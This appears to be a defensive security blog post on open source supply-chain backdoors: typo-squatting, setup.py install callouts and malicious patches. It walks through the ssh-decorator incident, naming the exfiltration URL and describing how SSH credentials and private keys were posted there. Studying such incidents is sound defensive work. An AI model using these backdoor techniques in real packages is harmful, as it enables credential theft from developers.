Open Source Backdoors in the Wild
Malicious actors will take advantage of any opportunity to exploit an attack vector for money, personal gain, or fun. For years, hackers have used supply chains to deploy backdoors because trusted software provides a relatively easy entry point. This post explores the techniques and methodologies hackers use to deploy and exploit these backdoors, using the ssh-decorator package as an illustrative example.
First, let’s outline some methods that bad actors use to compromise open source software and supply chains:
Since it is so easy to install packages with apt, npm, pip, etc. via terminal, those looking to infiltrate networks commonly use a software exploitation technique called typo-squatting. Take the django pip package as an example. The word “django” can easily be mistyped as “djamgo.” If this was a malicious package, a user could attempt to install using the “pip3 install djamgo” command thinking they are installing the correct package, without realizing they have actually installed a potential backdoor and foothold within their network.
This is not a hypothetical case – this real-life example of typo-squatting is already archived on PyPi’s repository. Additional examples abound and opportunities for exploitation abound.
Backdoors Installed with Setup.py
Setup.py builds, distributes, and installs modules. Some packages can be setup to automatically call out after installation, making setup.py files a highly popular mode for backdoor network infiltration.
Timing-Based Infiltration via Patching
This type of attack is the trickiest to catch and usually happens when network maintainer accounts are compromised or maintainers change. Usually when an attacker gains access to the target network, they will wait for the opportune time to patch in a backdoor in order to exfiltrate data. Once they are satisfied with the data they have collected, they can then revert the change. Now that the “supply” has been compromised, every single module that imports the package is also compromised. It appears this was the method used to compromise the ssh-decorator package, which is analyzed in detail below.
The below image shows the malicious code found in the ssh-decorator package, which the author said someone unlawfully uploaded after gaining access to the network. Let’s walk through what this code actually does.
One common property of backdoors or callbacks is the use of http urls. After urllib is imported, there’s an http endpoint “http://ssh-decorate.cf/index.php”.
Analyzing the urlopen function in this example, we can see the infiltrator is recording SSH login data then posting it to this “http://ssh-decorate.cf/index.php” endpoint over HTTP. After “try:”, you see the post variable is the urlencoded log function data. Then the handler variable uses the urlopen function, which is imported from urllib, to send the post data to the url.
Another giveaway that this is not a normal log function is the use of exception hiding.
If the urllib.request and urlib.parse imports fail and an exception is raised then there’s a backup plan implimented with urllib2.
Further specifics of the log backdoor function, shown below, detail what data from the SSH connection is being logged then posted to the callback url. As you can see, the server, port, private key, password, and user are all being logged. Not only is the infiltrator compromising one user’s critically sensitive data; he or she is also sending the data as plain text over HTTP, meaning the calls can be captured with any proxy or tool like Wireshark to further compromise anyone using the ssh-decorator package.
The below image shows the log function with the parameters sent in a post request.
Ways to Prevent Supply Chain Compromise & Detect Backdoors in Open Source Software
The first and recommended approach to guarantee your organization’s software supply chain is protected against open source exploitation is maintaining your own validated and thoroughly vetted third party source code repository.
Other analytic techniques to detect backdoors before they wreak havoc on your organization’s network can be used in combination and include:
- Analyzing the software’s commit history with a static analysis tool like gitinspector;
- Installing the package in a sandboxed environment first to monitor its callouts, either with Wireshark or at the network level, and;
- Once the source is validated, hashing the files from the repository and comparing them before compiling or installing, in order to make sure the files were not modified en route.
Following these security precautions helps ensure your organization remains resilient against open source software threats well into the future.